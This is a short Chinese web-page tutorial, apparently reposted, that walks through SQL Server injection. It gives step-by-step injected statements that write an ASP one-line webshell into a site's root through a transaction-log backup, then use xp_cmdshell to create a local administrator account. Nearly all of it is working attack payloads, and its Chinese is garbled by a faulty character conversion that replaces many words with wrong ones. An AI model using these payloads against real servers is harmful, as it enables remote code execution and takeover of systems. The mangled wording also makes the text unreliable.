sqlserver 手工完成差別備份的步調。本站提示廣大學習愛好者:(sqlserver 手工完成差別備份的步調)文章只能為提供參考,不一定能成為您想要的結果。以下是sqlserver 手工完成差別備份的步調正文
手工完成差別備份的步調
字符型:
1、恢復以後庫
;alter database 以後庫 set RECOVERY FULL--
2、建表cmd
;create table cmd (a image)--
3、備份以後庫到D:\cmd1
;backup log 以後庫 to disk = 'D:\cmd1' with init--
4、拔出一句話代碼到創立的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--
5、備份一句話代碼到站點根目次
;backup log 以後庫 to disk = 'D:\www_web\oct.asp'--
6、完成
;drop table 創立的表--
數字型
1、恢復以後庫
';alter database 以後庫 set RECOVERY FULL--
2、創立表cmd
';create table cmd (a image)--
3、備份以後庫到D:\cmd1
';backup log 以後庫 to disk = 'D:\cmd1' with init--
4、拔出一句話代碼到創立的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--
5、備份一句話代碼到站點根目次
';backup log 以後庫 to disk = 'D:\www_web\oct.asp'--
6、完成
';drop table 創立的表--
sa權限創立治理員用戶
1、斷定能否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 斷定以後體系的銜接用戶是否是sa
2、添加體系的治理員
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--
逍遙復仇:有對象我是必定不會手工的,費事。